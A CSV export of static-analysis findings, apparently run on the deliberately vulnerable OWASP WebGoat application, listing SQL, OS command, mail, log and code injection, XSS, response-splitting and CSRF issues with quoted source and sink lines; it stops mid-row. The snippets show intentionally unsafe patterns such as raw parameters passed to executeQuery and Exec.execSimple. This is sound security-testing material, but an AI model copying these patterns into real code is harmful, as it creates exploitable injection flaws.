High,564,Security,Injection,Java,30m,sql-injection/src/main/java/org/owasp/webgoat/plugin/sqlinjection/ViewProfileSqlInjection.java,109, ResultSet answer_results = answer_statement.executeQuery(query);,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,104, String value = (String) s.getRequest().getSession().getAttribute(name);,No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,sql-injection/src/main/java/org/owasp/webgoat/plugin/sqlinjection/ViewProfileSqlInjection.java,158, ResultSet answer_results = answer_statement.executeQuery(query);,sql-injection/src/main/java/org/owasp/webgoat/plugin/sqlinjection/ViewProfileSqlInjection.java,193,employeeId = s.getParser().getRawParameter(org.owasp.webgoat.plugin.sqlinjection.SQLInjection.EMPLOYEE_ID),No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,sql-numeric-injection/src/main/java/org/owasp/webgoat/plugin/SqlNumericInjection.java,120,results = statement.executeQuery(query),sql-numeric-injection/src/main/java/org/owasp/webgoat/plugin/SqlNumericInjection.java,99,"station = s.getParser().getRawParameter(STATION_ID, null);",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,sql-string-injection/src/main/java/org/owasp/webgoat/plugin/SqlStringInjection.java,103,results = statement.executeQuery(query),sql-string-injection/src/main/java/org/owasp/webgoat/plugin/SqlStringInjection.java,205," accountName = s.getParser().getRawParameter(ACCT_NAME, ""Your Name"");",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,thread-safety-problem/src/main/java/org/owasp/webgoat/plugin/ThreadSafetyProblem.java,96,results = statement.executeQuery(query),thread-safety-problem/src/main/java/org/owasp/webgoat/plugin/ThreadSafetyProblem.java,78,"currentUser = s.getParser().getRawParameter(USER_NAME, """");",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,webgoat-container/src/main/java/org/owasp/webgoat/lessons/admin/ViewDatabase.java,80,results = statement.executeQuery(sqlStatement.toString()),webgoat-container/src/main/java/org/owasp/webgoat/lessons/admin/ViewDatabase.java,66,"sqlStatement = new StringBuffer(s.getParser().getRawParameter(SQL, """"))",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,webgoat-container/src/main/java/org/owasp/webgoat/session/WebSession.java,736," return getCurrentLesson().isAuthorized(this, employeeId, functionId);",goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,133, String ss = (String) s.getRequest().getSession().getAttribute(name);,No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,webgoat-container/src/main/java/org/owasp/webgoat/session/WebSession.java,736," return getCurrentLesson().isAuthorized(this, employeeId, functionId);",goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,133, String ss = (String) s.getRequest().getSession().getAttribute(name);,No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,ws-sql-injection/src/main/java/org/owasp/webgoat/plugin/WsSqlInjection.java,232, ResultSet results = statement.executeQuery(query);,ws-sql-injection/src/main/java/org/owasp/webgoat/plugin/WsSqlInjection.java,160," accountNumber = s.getParser().getRawParameter(ACCT_NUM, ""101"");",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.MailCommandInjection,Mail Command Injection,Very High,93,Security,Injection,Java,30m,unchecked-email/src/main/java/org/owasp/webgoat/plugin/UncheckedEmail.java,369, msg.setSubject(subject);,unchecked-email/src/main/java/org/owasp/webgoat/plugin/UncheckedEmail.java,106,"subject = s.getParser().getRawParameter(SUBJECT, """")",No,"CWE:93,OWASP:2013:A1,PCI-DSS:6.5.1,WASC:30",none,CWEScope:Integrity, +OPT.JAVA.SEC_JAVA.LogForging,Improper Output Neutralization for Logs,Very High,117,Security,Injection,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/controller/Start.java,104," logger.error(""No valid WebSession object found, has session timed out? ["" + session.getId() + ""]"");",webgoat-container/src/main/java/org/owasp/webgoat/controller/Start.java,51,HttpServletRequest request,Yes,"CERT-J:IDS03-J,CWE:117,OWASP:2013:A1,OWASP-M:2014:M8,PCI-DSS:10.5.2,WASC:20",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.LogForging,Improper Output Neutralization for Logs,Very High,117,Security,Injection,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/controller/Start.java,108," logger.error(""Invalid WebSession object found, this is probably a bug! ["" + o.getClass() + "" | "" + session.getId() + ""]"");",webgoat-container/src/main/java/org/owasp/webgoat/controller/Start.java,51,HttpServletRequest request,Yes,"CERT-J:IDS03-J,CWE:117,OWASP:2013:A1,OWASP-M:2014:M8,PCI-DSS:10.5.2,WASC:20",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.LogForging,Improper Output Neutralization for Logs,Very High,117,Security,Injection,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/HammerHead.java,258,logger.debug(output);,webgoat-container/src/main/java/org/owasp/webgoat/HammerHead.java,256,"output = new Date() + "" | "" + request.getRemoteHost() + "":"" + request.getRemoteAddr() + "" | "" + message",Yes,"CERT-J:IDS03-J,CWE:117,OWASP:2013:A1,OWASP-M:2014:M8,PCI-DSS:10.5.2,WASC:20",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.LogForging,Improper Output Neutralization for Logs,Very High,117,Security,Injection,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/lessons/AbstractLesson.java,741,"logger.info(""authorized: "" + authorized);",webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",Yes,"CERT-J:IDS03-J,CWE:117,OWASP:2013:A1,OWASP-M:2014:M8,PCI-DSS:10.5.2,WASC:20",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.LogForging,Improper Output Neutralization for Logs,Very High,117,Security,Injection,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/service/BaseService.java,68,"logger.error(""Exception handler for service caught exception when processing: "" + url, ex);",webgoat-container/src/main/java/org/owasp/webgoat/service/BaseService.java,67,url = request.getRequestURL().toString(),No,"CERT-J:IDS03-J,CWE:117,OWASP:2013:A1,OWASP-M:2014:M8,PCI-DSS:10.5.2,WASC:20",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.LogForging,Improper Output Neutralization for Logs,Very High,117,Security,Injection,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/service/LessonMenuService.java,81,"logger.info(""Role: "" + role);",webgoat-container/src/main/java/org/owasp/webgoat/service/LessonMenuService.java,67,HttpSession session,No,"CERT-J:IDS03-J,CWE:117,OWASP:2013:A1,OWASP-M:2014:M8,PCI-DSS:10.5.2,WASC:20",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.LogForging,Improper Output Neutralization for Logs,Very High,117,Security,Injection,Java,06m,webgoat-container/src/main/java/org/owasp/webgoat/session/WebSession.java,1098,"logger.info(""PARM MAP: "" + parmMap);",webgoat-container/src/main/java/org/owasp/webgoat/session/WebSession.java,1097,parmMap = request.getParameterMap(),No,"CERT-J:IDS03-J,CWE:117,OWASP:2013:A1,OWASP-M:2014:M8,PCI-DSS:10.5.2,WASC:20",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.HttpSplittingRule,Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting'),Very High,113,Security,Injection,Java,30m,webgoat-container/src/main/java/org/owasp/webgoat/session/WebSession.java,300,response.addCookie(cookies[loop]);,webgoat-container/src/main/java/org/owasp/webgoat/session/WebSession.java,295,cookies = request.getCookies(),No,"CWE:113,OWASP:2013:A1,PCI-DSS:6.5.1,WASC:25",none,"CWEScope:Access-Control,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.FormatStringInjectionRule,Exclude unsanitized user input from format strings,Very High,134,Security,Injection,Java,06m,lesson-converter/src/main/java/org/owasp/webgoat/converter/ConverterMain.java,77," String newModule = String.format("" %s"", module);",lesson-converter/src/main/java/org/owasp/webgoat/converter/ConverterMain.java,98,String[] args,Yes,"CERT-J:IDS06-J,CWE:134,OWASP:2013:A5,OWASP:2013:A9,PCI-DSS:6.5.1,SANS25:2011:23,WASC:10",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.CrossSiteScriptingRule,Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),Very High,79,Security,Injection,Java,4h 00,cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/jsp/SearchStaff.jsp,11,"Employee <%=searchedName%> not found. +[servlet code: out.print(searchedName);]",cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/jsp/SearchStaff.jsp,7, String searchedName = request.getParameter(CrossSiteScripting.SEARCHNAME);,No,"CERT-J:IDS51-J,CWE:79,OWASP:2013:A3,OWASP:2013:A5,OWASP:2017:A7,OWASP-M:2014:M7,PCI-DSS:6.5.7,SANS25:2010:1,SANS25:2011:4,WASC:08",TO_REVIEW,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.CrossSiteScriptingRule,Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),Very High,79,Security,Injection,Java,4h 00,dangerous-eval-injection/src/main/resources/plugin/DangerousEval/jsp/eval.jsp,35," out.write(""alert('Purchase completed successfully with credit card \"""" + field2 + ""\"" and access code \"""" + field1 + ""\""');"");",dangerous-eval-injection/src/main/resources/plugin/DangerousEval/jsp/eval.jsp,6,"String field2 = request.getParameter(""field2"");",No,"CERT-J:IDS51-J,CWE:79,OWASP:2013:A3,OWASP:2013:A5,OWASP:2017:A7,OWASP-M:2014:M7,PCI-DSS:6.5.7,SANS25:2010:1,SANS25:2011:4,WASC:08",none,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.CrossSiteScriptingRule,Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),Very High,79,Security,Injection,Java,4h 00,db-cross-site-scripting/src/main/resources/plugin/DBCrossSiteScripting/jsp/SearchStaff.jsp,11,"Employee <%=searchedName%> not found. +[servlet code: out.print(searchedName);]",db-cross-site-scripting/src/main/resources/plugin/DBCrossSiteScripting/jsp/SearchStaff.jsp,7, String searchedName = request.getParameter(DBCrossSiteScripting.SEARCHNAME);,No,"CERT-J:IDS51-J,CWE:79,OWASP:2013:A3,OWASP:2013:A5,OWASP:2017:A7,OWASP-M:2014:M7,PCI-DSS:6.5.7,SANS25:2010:1,SANS25:2011:4,WASC:08",none,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.CrossSiteScriptingRule,Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),Very High,79,Security,Injection,Java,4h 00,db-sql-injection/src/main/resources/plugin/DBSQLInjection/jsp/SearchStaff.jsp,11,"Employee <%=searchedName%> not found. +[servlet code: out.print(searchedName);]",db-sql-injection/src/main/resources/plugin/DBSQLInjection/jsp/SearchStaff.jsp,7, String searchedName = request.getParameter(DBSQLInjection.SEARCHNAME);,No,"CERT-J:IDS51-J,CWE:79,OWASP:2013:A3,OWASP:2013:A5,OWASP:2017:A7,OWASP-M:2014:M7,PCI-DSS:6.5.7,SANS25:2010:1,SANS25:2011:4,WASC:08",none,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.CrossSiteScriptingRule,Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),Very High,79,Security,Injection,Java,4h 00,sql-injection/src/main/resources/plugin/SQLInjection/jsp/SearchStaff.jsp,11,"Employee <%=searchedName%> not found. +[servlet code: out.print(searchedName);]",sql-injection/src/main/resources/plugin/SQLInjection/jsp/SearchStaff.jsp,7, String searchedName = request.getParameter(SQLInjection.SEARCHNAME);,No,"CERT-J:IDS51-J,CWE:79,OWASP:2013:A3,OWASP:2013:A5,OWASP:2017:A7,OWASP-M:2014:M7,PCI-DSS:6.5.7,SANS25:2010:1,SANS25:2011:4,WASC:08",none,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.CrossSiteScriptingRule,Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),Very High,79,Security,Injection,Java,4h 00,webgoat-container/src/main/webapp/main.jsp,99,"<%=(lesson.isCompleted(webSession) ? lessonComplete : """")%>""><%=lesson.getTitle()%> +[servlet code: out.print((lesson.isCompleted(webSession) ? lessonComplete : """"));]",webgoat-container/src/main/java/org/owasp/webgoat/session/UserTracker.java,181," return getLessonTracker(s, s.getUserName(), screen);",No,"CERT-J:IDS51-J,CWE:79,OWASP:2013:A3,OWASP:2013:A5,OWASP:2017:A7,OWASP-M:2014:M7,PCI-DSS:6.5.7,SANS25:2010:1,SANS25:2011:4,WASC:08",none,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.CrossSiteScriptingRule,Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),Very High,79,Security,Injection,Java,4h 00,webgoat-container/src/main/webapp/main.jsp,238, out.println(printParameters);,webgoat-container/src/main/webapp/main.jsp,237," printParameters = ""
    "" + p.getName() + ""="" + p.getValue() + ""

    "";",No,"CERT-J:IDS51-J,CWE:79,OWASP:2013:A3,OWASP:2013:A5,OWASP:2017:A7,OWASP-M:2014:M7,PCI-DSS:6.5.7,SANS25:2010:1,SANS25:2011:4,WASC:08",none,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.CrossSiteScriptingRule,Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),Very High,79,Security,Injection,Java,4h 00,webgoat-container/src/main/webapp/main.jsp,247, out.println(printCookies);,webgoat-container/src/main/webapp/main.jsp,246," printCookies = ""
    "" + c.getName() + "" \""\"" "" + c.getValue() + ""

    "";",No,"CERT-J:IDS51-J,CWE:79,OWASP:2013:A3,OWASP:2013:A5,OWASP:2017:A7,OWASP-M:2014:M7,PCI-DSS:6.5.7,SANS25:2010:1,SANS25:2011:4,WASC:08",none,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.CrossSiteScriptingRule,Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),Very High,79,Security,Injection,Java,4h 00,webgoat-container/src/main/webapp/main.jsp,261,"
    Stage <%= rla.getLessonTracker(webSession).getStageNumber(rla.getStage(webSession)) + 1%>
    +[servlet code: out.print( rla.getLessonTracker(webSession).getStageNumber(rla.getStage(webSession)) + 1);]",webgoat-container/src/main/java/org/owasp/webgoat/session/UserTracker.java,181," return getLessonTracker(s, s.getUserName(), screen);",No,"CERT-J:IDS51-J,CWE:79,OWASP:2013:A3,OWASP:2013:A5,OWASP:2017:A7,OWASP-M:2014:M7,PCI-DSS:6.5.7,SANS25:2010:1,SANS25:2011:4,WASC:08",TO_REVIEW,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.CrossSiteScriptingRule,Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),Very High,79,Security,Injection,Java,4h 00,webgoat-container/src/main/webapp/main.jsp,261,"
    Stage <%= rla.getLessonTracker(webSession).getStageNumber(rla.getStage(webSession)) + 1%>
    +[servlet code: out.print( rla.getLessonTracker(webSession).getStageNumber(rla.getStage(webSession)) + 1);]",webgoat-container/src/main/java/org/owasp/webgoat/session/UserTracker.java,181," return getLessonTracker(s, s.getUserName(), screen);",No,"CERT-J:IDS51-J,CWE:79,OWASP:2013:A3,OWASP:2013:A5,OWASP:2017:A7,OWASP-M:2014:M7,PCI-DSS:6.5.7,SANS25:2010:1,SANS25:2011:4,WASC:08",none,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.CrossSiteScriptingRule,Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),Very High,79,Security,Injection,Java,4h 00,webgoat-container/src/main/webapp/main.jsp,265,"<%=webSession.getInstructions()%>
    +[servlet code: out.print(webSession.getInstructions());]",webgoat-container/src/main/java/org/owasp/webgoat/session/UserTracker.java,181," return getLessonTracker(s, s.getUserName(), screen);",No,"CERT-J:IDS51-J,CWE:79,OWASP:2013:A3,OWASP:2013:A5,OWASP:2017:A7,OWASP-M:2014:M7,PCI-DSS:6.5.7,SANS25:2010:1,SANS25:2011:4,WASC:08",none,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.CrossSiteScriptingRule,Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),Very High,79,Security,Injection,Java,4h 00,webgoat-container/src/main/webapp/main.jsp,266,"
    <%=webSession.getMessage()%>
    +[servlet code: out.print(webSession.getMessage());]",webgoat-container/src/main/java/org/owasp/webgoat/session/UserTracker.java,181," return getLessonTracker(s, s.getUserName(), screen);",No,"CERT-J:IDS51-J,CWE:79,OWASP:2013:A3,OWASP:2013:A5,OWASP:2017:A7,OWASP-M:2014:M7,PCI-DSS:6.5.7,SANS25:2010:1,SANS25:2011:4,WASC:08",none,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.CrossSiteScriptingRule,Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),Very High,79,Security,Injection,Java,4h 00,webgoat-container/src/main/webapp/main.jsp,277,"
    <%=currentLesson.getContent()%>
    +[servlet code: out.print(currentLesson.getContent());]",webgoat-container/src/main/java/org/owasp/webgoat/session/UserTracker.java,181," return getLessonTracker(s, s.getUserName(), screen);",No,"CERT-J:IDS51-J,CWE:79,OWASP:2013:A3,OWASP:2013:A5,OWASP:2017:A7,OWASP-M:2014:M7,PCI-DSS:6.5.7,SANS25:2010:1,SANS25:2011:4,WASC:08",none,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.CrossSiteRequestForgeryRule,Cross-site request forgery (CSRF),Very High,352,Security,Injection,Java,30m,webgoat-container/src/main/webapp/WEB-INF/spring-security.xml,14,"[CSRF protection not explicitly enabled] +Only enabled for Spring-Security 4.x+ +",,,,No,"CWE:352,OWASP:2013:A8,PCI-DSS:6.5.1,SANS25:2010:4,SANS25:2011:12,WASC:9",TO_REVIEW,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.CrossSiteRequestForgeryRule,Cross-site request forgery (CSRF),Very High,352,Security,Injection,Java,30m,webgoat-container/src/main/webapp/WEB-INF/spring-security.xml,15,"[CSRF protection not explicitly enabled] +Only enabled for Spring-Security 4.x+ +",,,,No,"CWE:352,OWASP:2013:A8,PCI-DSS:6.5.1,SANS25:2010:4,SANS25:2011:12,WASC:9",TO_REVIEW,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.CrossSiteRequestForgeryRule,Cross-site request forgery (CSRF),Very High,352,Security,Injection,Java,30m,webgoat-container/src/main/webapp/WEB-INF/spring-security.xml,17,"[CSRF protection not explicitly enabled] +Only enabled for Spring-Security 4.x+ +",,,,No,"CWE:352,OWASP:2013:A8,PCI-DSS:6.5.1,SANS25:2010:4,SANS25:2011:12,WASC:9",TO_REVIEW,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.CrossSiteRequestForgeryRule,Cross-site request forgery (CSRF),Very High,352,Security,Injection,Java,30m,webgoat-container/src/main/webapp/WEB-INF/spring-security.xml,18,"[CSRF protection not explicitly enabled] +Only enabled for Spring-Security 4.x+ +",,,,No,"CWE:352,OWASP:2013:A8,PCI-DSS:6.5.1,SANS25:2010:4,SANS25:2011:12,WASC:9",TO_REVIEW,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.CrossSiteRequestForgeryRule,Cross-site request forgery (CSRF),Very High,352,Security,Injection,Java,30m,webgoat-container/src/main/webapp/WEB-INF/spring-security.xml,19,"[CSRF protection not explicitly enabled] +Only enabled for Spring-Security 4.x+ +",,,,No,"CWE:352,OWASP:2013:A8,PCI-DSS:6.5.1,SANS25:2010:4,SANS25:2011:12,WASC:9",TO_REVIEW,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.CrossSiteRequestForgeryRule,Cross-site request forgery (CSRF),Very High,352,Security,Injection,Java,30m,webgoat-container/src/main/webapp/WEB-INF/spring-security.xml,20,"[CSRF protection not explicitly enabled] +Only enabled for Spring-Security 4.x+ +",,,,No,"CWE:352,OWASP:2013:A8,PCI-DSS:6.5.1,SANS25:2010:4,SANS25:2011:12,WASC:9",TO_REVIEW,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.CrossSiteRequestForgeryRule,Cross-site request forgery (CSRF),Very High,352,Security,Injection,Java,30m,webgoat-container/src/main/webapp/WEB-INF/spring-security.xml,21,"[CSRF protection not explicitly enabled] +Only enabled for Spring-Security 4.x+ +",,,,No,"CWE:352,OWASP:2013:A8,PCI-DSS:6.5.1,SANS25:2010:4,SANS25:2011:12,WASC:9",TO_REVIEW,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.CrossSiteRequestForgeryRule,Cross-site request forgery (CSRF),Very High,352,Security,Injection,Java,30m,webgoat-container/src/main/webapp/WEB-INF/spring-security.xml,16,"[CSRF protection not explicitly enabled] +Only enabled for Spring-Security 4.x+ +",,,,Yes,"CWE:352,OWASP:2013:A8,PCI-DSS:6.5.1,SANS25:2010:4,SANS25:2011:12,WASC:9",TO_REVIEW,"CWEScope:Access-Control,CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.CommandInjectionRule,Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'),Very High,78,Security,Injection,Java,30m,challenge/src/main/java/org/owasp/webgoat/plugin/ChallengeScreen.java,648,er = Exec.execSimple(cmd);,challenge/src/main/java/org/owasp/webgoat/plugin/ChallengeScreen.java,639,"protocol = s.getParser().getRawParameter(PROTOCOL, ""tcp"")",No,"CERT-J:IDS07-J,CWE:77,CWE:78,OWASP:2013:A1,OWASP:2013:A5,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:9,SANS25:2011:2,WASC:31",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.CommandInjectionRule,Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'),Very High,78,Security,Injection,Java,30m,challenge/src/main/java/org/owasp/webgoat/plugin/ChallengeScreen.java,653,er = Exec.execSimple(cmd);,challenge/src/main/java/org/owasp/webgoat/plugin/ChallengeScreen.java,639,"protocol = s.getParser().getRawParameter(PROTOCOL, ""tcp"")",No,"CERT-J:IDS07-J,CWE:77,CWE:78,OWASP:2013:A1,OWASP:2013:A5,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:9,SANS25:2011:2,WASC:31",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.CommandInjectionRule,Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'),Very High,78,Security,Injection,Java,30m,command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjection.java,203, ExecResults er = Exec.execSimple(command);,command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjection.java,86,"helpFile = s.getParser().getRawParameter(HELP_FILE, ""BasicAuthentication.help"")",No,"CERT-J:IDS07-J,CWE:77,CWE:78,OWASP:2013:A1,OWASP:2013:A5,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:9,SANS25:2011:2,WASC:31",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.CommandInjectionRule,Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'),Very High,78,Security,Injection,Java,30m,command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjection.java,203, ExecResults er = Exec.execSimple(command);,command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjection.java,86,"helpFile = s.getParser().getRawParameter(HELP_FILE, ""BasicAuthentication.help"")",No,"CERT-J:IDS07-J,CWE:77,CWE:78,OWASP:2013:A1,OWASP:2013:A5,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:9,SANS25:2011:2,WASC:31",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity,CWEScope:Non-Repudiation", +OPT.JAVA.SEC_JAVA.CodeInjectionRule,Dynamic code injection in scripting API,Very High,95,Security,Injection,Java,30m,blind-script/src/main/java/org/owasp/webgoat/plugin/BlindScript.java,280," Method meth = cls.getMethod(method, parameterType);",blind-script/src/main/java/org/owasp/webgoat/plugin/BlindScript.java,125,"method = 